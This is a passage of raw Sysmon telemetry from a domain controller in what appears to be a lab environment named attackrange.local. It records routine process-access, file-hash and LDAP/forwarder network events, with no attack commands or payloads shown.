0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A6AA-00000000AD01}15836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002239778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:47.951{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E4CD5B2FAF4E7298F7AAE1FE849A1972,SHA256=6EDD6DD499BC01BA2CB24481703E1215343D60720CF3402013ECAACE94279A58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:47.951{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CBCFE82A034BA51B7378D86856A8895,SHA256=6936923A87FAD5B76C7BE6E9226F1ED378D18FFAB034DE78DAEE1E7592A7E4A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002239776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:37.210{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60142-false10.0.1.12-8000- 23542300x80000000000000002239775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:47.065{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3639E064493CC70ECCE03CCCB83204BF,SHA256=5391428450946AF1BC08062DE4723468FE7DE9AD411AE8A0CFEB0B254AA781DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:50.951{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7EFF30F1CBBFA620DDF05B243EA36C79,SHA256=C286C3684E250D5FAEDEE23953354A3CB95D48B68D30127439C944C7394B129F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:50.171{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A39827721531B7CA72AA3473B0960B29,SHA256=8E72FA9A2FB4A93F65FDB5AC68A948669D036605397A4C452C9F0BE5CB4F1681,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002239782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:40.945{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60143-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002239781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:40.945{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60143-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000002239784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:52.685{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D36E966F3FF28FDAC72C3E8A800C9250,SHA256=0C40D4F855F7E3B6E50643B611F01FAB587B864314BF52DED035AF704879F10F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002239783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:42.273{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60144-false10.0.1.12-8000- 10341000x80000000000000002239885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 